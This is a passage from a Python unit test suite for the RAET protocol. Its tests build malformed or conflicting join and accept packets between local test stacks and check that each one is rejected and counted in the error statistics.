self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
betaRemoteAlpha = beta.remotes.values()[0]
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Accepted
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Any
# Mutable: No
beta.mutable = False
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
# Action: Refuse
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_unallowed', beta.stats)
self.assertEqual(beta.stats['join_renew_unallowed'], 1)
self.assertIn('stale_nuid', alpha.stats)
self.assertEqual(alpha.stats['stale_nuid'], 1)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alphaRemoteBeta.joined, True) # Alpha got no response after renew request
self.assertIs(betaRemoteAlpha.joined, None)
self.assertIs(beta.mutable, False)
self.assertTrue(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.accepted.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], oldUid) # renew was refused
self.assertEqual(remoteData['role'], alpha.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonMainRejectJoin(self):
'''
Test non main joinent reject join (coverage)
'''
console.terse("{0}\n".format(self.testJoinentNonMainRejectJoin.__doc__))
alpha, beta = self.bootstrapStacks()
alpha.main = False
# Test
self.join(beta, alpha)
# Action: nack reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
self.assertIs(alpha.mutable, None)
self.assertIs(beta.mutable, None)
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
allRemoteData = alpha.keep.loadAllRemoteData()
self.assertEqual(len(allRemoteData), 0)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinRenameRemoteFail(self):
'''
Test joinent join renameRemote() call fail (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinRenameRemoteFail.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.mutable = True
alpha.nameRemotes['beta_wrong'] = alpha.nameRemotes[beta.name]
del alpha.nameRemotes[beta.name]
beta.name = 'beta_new'
# Test
self.join(beta, alpha)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentJoinRejectNameConflict(self):
'''
Test joinent join non unique name fail (coverage)
'''
console.terse("{0}\n".format(self.testJoinentJoinRejectNameConflict.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Create another one stack
gammaData = self.createRoadData(base=self.base,
name='gamma',
ha=("", 7532),
main=None,
auto=raeting.AutoMode.always.value)
keeping.clearAllKeep(gammaData['dirpath'])
gamma = self.createRoadStack(data=gammaData)
self.join(gamma, alpha)
self.assertTrue(gamma.remotes.values()[0].joined)
# Rename gamma to 'beta'
alpha.mutable = True
gamma.name = 'beta'
# Test
self.join(gamma, alpha)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptRejectNameConflict(self):
'''
Test joiner.join rejects rename if such name is already registered (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptRejectNameConflict.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
fakeRemote = beta.addRemote(
estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
name='alpha_new',
ha=(alpha.local.ha[0], alpha.local.ha[1] + 10)))
alpha.name = 'alpha_new'
beta.mutable = True
# Test
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptRejectRenameFail(self):
'''
Test joiner reject rename if renameRemote() fail (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptRejectRenameFail.__doc__))
# Status: Accepted (auto accept keys)
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
beta.mutable = True
# Following will produce rename fail
beta.nameRemotes['alpha_wrong'] = beta.nameRemotes[alpha.name]
del beta.nameRemotes[alpha.name]
alpha.name = 'alpha_new'
# Test
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: nack reject
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptErrorParseInner(self):
'''
Test joiner.accept got error on parsing packet inner (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptErrorParseInner.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept parseInner error *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set incorrect coat kind
data['ck'] = -1
# skip actual joinent.join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('parsing_inner_error', beta.stats)
self.assertEqual(beta.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingName(self):
'''
Test joiner.accept packet has no name (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingName.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing name *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.name = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingMode(self):
'''
Test joiner.accept packet has no mode (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingMode.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing mode *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Skip actual join, it's not needed for test
# ack accept
if alpha.kind is None:
alpha.kind = 0
# Hack: set mode to none
body = odict([ ('name', alpha.local.name),
('mode', None),
('kind', alpha.kind),
('uid', remote.uid),
('verhex', str(alpha.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(alpha.local.priver.pubhex.decode('ISO-8859-1'))),
('role', alpha.local.role)])
packet = packeting.TxPacket(stack=alpha,
kind=raeting.PcktKind.response.value,
embody=body,
data=joinent.txData)
packet.pack()
console.concise("Joinent {0}. Do Accept of {1} at {2}\n".format(
alpha.name, alpha.name, alpha.store.stamp))
joinent.transmit(packet)
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingKind(self):
'''
Test joiner.accept packet has no kind (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing kind *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
flags = [0, 0, 0, 0, 0, 0, 0, alpha.main] # stack operation mode flags
operation = packByte(fmt=b'11111111', fields=flags)
# Skip actual join, it's not needed for test
# Hack: set mode to none
body = odict([ ('name', alpha.local.name),
('mode', operation),
('kind', None),
('uid', remote.uid),
('verhex', str(alpha.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(alpha.local.priver.pubhex.decode('ISO-8859-1'))),
('role', alpha.local.role)])
packet = packeting.TxPacket(stack=alpha,
kind=raeting.PcktKind.response.value,
embody=body,
data=joinent.txData)
packet.pack()
console.concise("Joinent {0}. Do Accept of {1} at {2}\n".format(
alpha.name, alpha.name, alpha.store.stamp))
joinent.transmit(packet)
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingUid(self):
'''
Test joiner.accept packet has no uid (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingUid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing uid *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Skip actual join, it's not needed for test
flags = [0, 0, 0, 0, 0, 0, 0, alpha.main] # stack operation mode flags
operation = packByte(fmt=b'11111111', fields=flags)
# Skip actual join, it's not needed for test
# Hack: set remote uid to None
body = odict([ ('name', alpha.local.name),
('mode', operation),
('kind', alpha.kind),
('uid', None),
('verhex', str(alpha.local.signer.verhex.decode('ISO-8859-1'))),
('pubhex', str(alpha.local.priver.pubhex.decode('ISO-8859-1'))),
('role', alpha.local.role)])
packet = packeting.TxPacket(stack=alpha,
kind=raeting.PcktKind.response.value,
embody=body,
data=joinent.txData)
packet.pack()
console.concise("Joinent {0}. Do Accept of {1} at {2}\n".format(
alpha.name, alpha.name, alpha.store.stamp))
joinent.transmit(packet)
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingVerhex(self):
'''
Test joiner.accept packet has no verhex (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingVerhex.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing verhex *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.signer.verhex = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingPubhex(self):
'''
Test joiner.accept packet has no pubhex (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingPubhex.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing pubhex *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.priver.pubhex = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAcceptMissingRole(self):
'''
Test joiner.accept packet has no role (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAcceptMissingRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
console.terse("\nTest joiner accept missing role *********\n")
beta.join()
self.serviceStacks([beta], duration=0.1)
# service alpha, reply
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: set stack name to None
alpha.local.role = None
# Skip actual join, it's not needed for test
joinent.ackAccept()
self.serviceStacks([alpha], duration=0.1)
self.serviceStacks([beta], duration=0.1)
self.assertIn('invalid_accept', beta.stats)
self.assertEqual(beta.stats['invalid_accept'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testVacuousJoinerAcceptConflictNames(self):
'''
Test joiner.accept with name conflict (coverage)
'''
console.terse("{0}\n".format(self.testVacuousJoinerAcceptConflictNames.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
alphaRemoteBeta = alpha.remotes.values()[0]
betaRemoteAlpha = beta.remotes.values()[0]
gammaData = self.createRoadData(base=self.base,
name='gamma',
ha=("", raeting.RAET_TEST_PORT+1),
main=True,
auto=raeting.AutoMode.once.value)
keeping.clearAllKeep(gammaData['dirpath'])
gamma = self.createRoadStack(data=gammaData)
console.terse("\nJoin Transaction **************\n")
betaRemoteGamma = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=gamma.local.ha))
beta.join(uid=betaRemoteGamma.uid)
self.serviceStacks([beta, gamma])
# Test:
console.terse("\nTest joiner accept name conflict *********\n")
beta.mutable = True
alpha.local.name = 'gamma'
# Vacuous
betaRemoteAlpha.fuid = 0
self.join(beta, alpha)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testVacuousJoinerAcceptRenameFail(self):
'''
Test joiner.accept fail rename remote (coverage)
'''
console.terse("{0}\n".format(self.testVacuousJoinerAcceptRenameFail.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
# Test:
beta.clearStats()
console.terse("\nTest joiner accept rename fail *********\n")
beta.mutable = True
# Rename alpha to beta so:
# - this would produce name conflict on rename
# - this wouldn't be covered by pre-checks before call renameRemote
alpha.local.name = 'beta'
# Vacuous
beta.remotes.values()[0].fuid = 0
self.join(beta, alpha)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerPendErrorParseInner(self):
'''
Test joiner.pend got error on parsing packet inner (coverage)
'''
console.terse("{0}\n".format(self.testJoinerPendErrorParseInner.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.keep.auto = raeting.AutoMode.never.value
alpha.mutable = True
alphaRemoteBeta = alpha.remotes.values()[0]
alpha.keep.pendRemote(alphaRemoteBeta)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
# service alpha
alpha.serviceReceives()
raw, sa = alpha.rxes.popleft()
console.verbose("{0} received packet\n{1}\n".format(alpha.name, raw))
packet = packeting.RxPacket(stack=self, packed=raw)
packet.parseOuter()
sh, sp = sa
packet.data.update(sh=sh, sp=sp)
# process rx
remote = alpha.remotes.get(packet.data['de'], None)
# reply join
timeout = alpha.JoinentTimeout
data = odict(hk=alpha.Hk, bk=alpha.Bk)
joinent = transacting.Joinent(stack=alpha,
remote=remote,
timeout=timeout,
sid=packet.data['si'],
tid=packet.data['ti'],
txData=data,
rxPacket=packet)
# Hack: break packet inner
data['ck'] = -1
# Skip actual join, it's not needed for test
joinent.ackPend()
self.serviceStacks([alpha], duration=0.1) # handle and respond
self.serviceStacks([beta], duration=0.1) # receive response
# Checks
self.assertIn('parsing_inner_error', beta.stats)
self.assertEqual(beta.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNackErrorPack(self):
'''
Test joiner.nack packet.pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinerNackErrorPack.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
beta.keep.auto = raeting.AutoMode.never.value
beta.mutable = True
betaRemoteAlpha = beta.remotes.values()[0]
beta.keep.rejectRemote(betaRemoteAlpha) # force nack the next join request
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # handle and respond
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
self.serviceStacks([beta], duration=0.1) # receive response, pend
raeting.UDP_MAX_PACKET_SIZE = default_size
# Checks
self.assertIn('packing_error', beta.stats)
self.assertEqual(beta.stats['packing_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNackIncorrectPacketKind(self):
'''
Test joiner.nack packet not expected packet type (coverage)
'''
console.terse("{0}\n".format(self.testJoinerNackIncorrectPacketKind.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
beta.clearStats()
beta.join()
beta.transactions[0].nack(kind=raeting.PcktKind.unknown.value)
# Checks
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAckPendErrorPack(self):
'''
Test joiner.ackPend packet.pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAckPendErrorPack.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
beta.keep.auto = raeting.AutoMode.never.value
beta.mutable = True
betaRemoteAlpha = beta.remotes.values()[0]
beta.keep.pendRemote(betaRemoteAlpha)
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # handle and respond
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
self.serviceStacks([beta], duration=0.1) # receive response, pend
raeting.UDP_MAX_PACKET_SIZE = default_size
# Checks
self.assertIn('packing_error', beta.stats)
self.assertEqual(beta.stats['packing_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAckAcceptErrorPack(self):
'''
Test joiner.ackAccept packet.pack error (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAckAcceptErrorPack.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Test
beta.join()
self.serviceStacks([beta], duration=0.1) # send join
self.serviceStacks([alpha], duration=0.1) # handle and respond
default_size = raeting.UDP_MAX_PACKET_SIZE
raeting.UDP_MAX_PACKET_SIZE = 10 # packet.pack() will throw PacketError
self.serviceStacks([beta], duration=0.1) # receive response, pend
raeting.UDP_MAX_PACKET_SIZE = default_size
# Checks
self.assertIn('packing_error', beta.stats)
self.assertEqual(beta.stats['packing_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerAckAcceptCascade(self):
'''
Test joiner.ackAccept cascade (coverage)
'''
console.terse("{0}\n".format(self.testJoinerAckAcceptCascade.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
# Test
beta.join(cascade=True)
self.serviceStacks([alpha, beta])
# Checks
for stack in [alpha, beta]:
remote = stack.remotes.values()[0]
self.assertTrue(remote.joined, True)
self.assertTrue(remote.allowed, True)
self.assertTrue(remote.alived, True)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerRefuseErrorParseInner(self):
'''
Test joiner.refuse error parse inner (coverage)
'''
console.terse("{0}\n".format(self.testJoinerRefuseErrorParseInner.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.keep.auto = raeting.AutoMode.never.value
alpha.keep.pendRemote(alpha.remotes.values()[0])
# Test
beta.join(cascade=True)
self.serviceStacks([beta], duration=0.1) # process, send join
self.serviceStacks([alpha], duration=0.1) # process join, add pend transaction
# Do malformed nack from alpha
alpha.transactions[0].txData['ck'] = -1
self.store.advanceStamp(stacking.RoadStack.JoinerTimeout) # set timeout expiresd
self.serviceStacks([alpha], duration=0.1) # handle timeout, send nack
self.store.advanceStamp(0.05)
time.sleep(0.05)
self.serviceStacks([beta], duration=0.1) # receive and handle
# Checks
self.assertIn('parsing_inner_error', beta.stats)
self.assertEqual(beta.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerRejectErrorParseInner(self):
'''
Test joiner.reject error parse inner (coverage)
'''
console.terse("{0}\n".format(self.testJoinerRejectErrorParseInner.__doc__))
alpha, beta = self.bootstrapJoinedRemotes()
alpha.keep.auto = raeting.AutoMode.never.value
alpha.keep.pendRemote(alpha.remotes.values()[0])
# Test
beta.join(cascade=True)
self.serviceStacks([beta], duration=0.1) # process, send join
self.serviceStacks([alpha], duration=0.1) # process join, add pend transaction
# Do malformed nack from alpha
alpha.transactions[0].txData['ck'] = -1
alpha.transactions[0].nack(kind=raeting.PcktKind.reject.value)
self.serviceStacks([alpha], duration=0.1) # process join, add pend transaction
self.serviceStacks([beta], duration=0.1) # receive and handle
# Checks
self.assertIn('parsing_inner_error', beta.stats)
self.assertEqual(beta.stats['parsing_inner_error'], 1)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerClearJoinentNotClear(self):
'''
Test joiner join after Joiner loses its remotes but Joinent did not. (coverage)
This is a coverage test to verify common use case
'''
console.terse("{0}\n".format(self.testJoinerClearJoinentNotClear.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=False, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=False, )
self.assertIs(beta.local.role, 'beta')
